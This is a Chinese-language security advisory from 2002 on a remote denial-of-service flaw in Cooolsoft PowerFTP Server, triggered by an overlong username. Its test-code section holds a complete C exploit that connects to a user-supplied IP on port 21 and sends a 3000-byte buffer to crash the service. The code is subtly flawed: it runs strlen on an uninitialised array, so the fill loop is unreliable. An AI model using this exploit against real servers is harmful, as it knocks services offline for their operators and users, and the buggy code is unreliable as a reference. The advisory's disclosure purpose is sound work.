Cooolsoft PowerFTP Server存在远程拒绝服务攻击

发布时间：2002-10-11
更新时间：2002-10-11
严重程度：中
威胁程度：远程拒绝服务
错误类型：边界检查错误
利用方式：服务器模式

BUGTRAQ ID：5899

受影响系统

Cooolsoft PowerFTP 2.0 3
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP1
   - Microsoft Windows NT 4.0 SP2
   - Microsoft Windows NT 4.0 SP3
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a
Cooolsoft PowerFTP 2.10
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
Cooolsoft PowerFTP 2.23
Cooolsoft PowerFTP 2.24

详细描述
PowerFTP server是FTP服务程序。

PowerFTP server没有正确的处理超长用户名数据，攻击者提交超过3000或者更多字节的用户名，可导致服务程序崩溃。

测试代码
/* Remote DoS Exploit for PowerFTP server (all version) */
/* Coding by Morgan A. member of secureNT-2000 Greetz : */
/* kdm, Yann, GaLiaRepT, and all i've forgotten ;)      */

#include <stdio.h>
#include <winsock.h>
        #pragma comment(lib, "wsock32.lib")

void main()
        {
        WSADATA WSAData;
                WSAStartup(MAKEWORD(2,0), &WSAData);

                SOCKET sock;
                SOCKADDR_IN sin;
                char *buffer = new char[255];

        char ip[50];
        printf ("Remote DoS Exploit for PowerFTP server\n\n");
        printf ("Remote IP: ");
        scanf ("%s", &ip);

        char DoS[3000];
        int i;
        for(i=0;i<strlen(DoS);i++)
        {
        DoS[i]= 'A';
        }

        sock = socket(AF_INET, SOCK_STREAM, 0);

                sin.sin_addr.s_addr                     = inet_addr(ip);
                sin.sin_family                          = AF_INET;
                sin.sin_port                            = htons(21);

                connect(sock, (SOCKADDR *)&sin, sizeof(sin));
                send(sock, DoS, sizeof(DoS), 0);
                closesocket(sock);
                WSACleanup();
        }

解决方案
无

相关信息
Armand Morgan <morgan53@evhr.net>.
参考：http://online.securityfocus.com/archive/1/294157
相关主页：http://www.cooolsoft.com/powerftp.htm

最近严重漏洞

Cooolsoft PowerFTP Server存在远程拒绝服务攻击